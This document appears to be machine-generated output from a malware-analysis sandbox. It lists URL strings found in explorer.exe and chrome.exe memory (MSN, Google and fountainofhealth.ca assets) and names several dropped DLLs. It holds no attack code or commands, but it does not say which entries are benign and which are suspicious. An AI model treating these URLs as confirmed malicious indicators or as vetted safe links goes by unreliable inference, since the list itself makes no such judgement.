Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS000.
Source: explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSosk.exe
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSsRN
Source: explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSte=Y_
Source: explorer.exe, 00000014.00000003.1920742592.0000000008207000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000081DE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?=
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=BD3E37D8C4964A928E655AAA177D65C1&timeOut=5000&oc
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008350000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t2
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/WindyV2.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://becausemomsays.com/she-wanted-to-keep-her-deceased-husbands-ring-so-she-selfishly-denied-her
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ-dark
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V-dark
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: chrome.exe, 00000000.00000003.1856103954.0000742401145000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016699284.0000742400A07000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000000.00000003.1815893324.0000742402F4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/uma/v2
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cookpolitical.com/2020-national-popular-vote-tracker
Source: chrome.exe, 00000000.00000003.2420118176.0000742402CD6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/cloudview-release
Source: chrome.exe, 00000000.00000003.2420118176.0000742402CD6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/cloudview-releasecross-origin-resource-policy:cross-origincross-origi
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagl
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoib
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult0A
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultr7
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflook
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbb
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbo
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://financebuzz.com/top-signs-of-financial-fitness?utm_source=msn&utm_medium=feed&synd_slide=1&s
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016795559.00007424030C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/.ca/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/cdn-cgi/challenge-platform/h/g/scripts/jsd/6fab0cec561d/main.js?
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/cdn-cgi/rum?
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.1694222507.0000742401CEC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2E027DA2CDEC333310
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.3228919167.0000742400407000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.position.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/jquery.tabbable.shim.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/layout_discovery/layouts/onecol/onecol.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/fieldgroup.module.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/fieldgroup.module.css?swwsy8$t
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/views/css/views-responsive-grid.css?swwsy8
Source: chrome.exe, 00000000.00000003.1653712601.0000742400525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en#
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en(
Source: chrome.exe, 00000000.00000003.2746010123.0000742401B16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en/search/node
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/js/ajax-throbber.js?v=1.x
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/google_analytics/js/google_analytics.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016795559.00007424030C2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.behaviors.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.states.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.pngme
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.png
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.pngler
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
Source: chrome.exe, 00000000.00000003.2705710332.0000742401585000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-h_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-i_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-v_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook.svg
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svg
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-1-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-H-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-V-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-download-40.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gif
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/dialog.js?swwsy8trap/js/misc/states.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/drupal.bootstrap.js?swwsy8
Source: chrome.exe, 00000000.00000003.3228919167.0000742400407000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/ajax.js?swwsy8
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/dialog.ajax.js?swwsy8
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/dialog.ajax.js?swwsy8t
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/message.js?swwsy8
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swwsy8
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swwsy810.1.0
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8
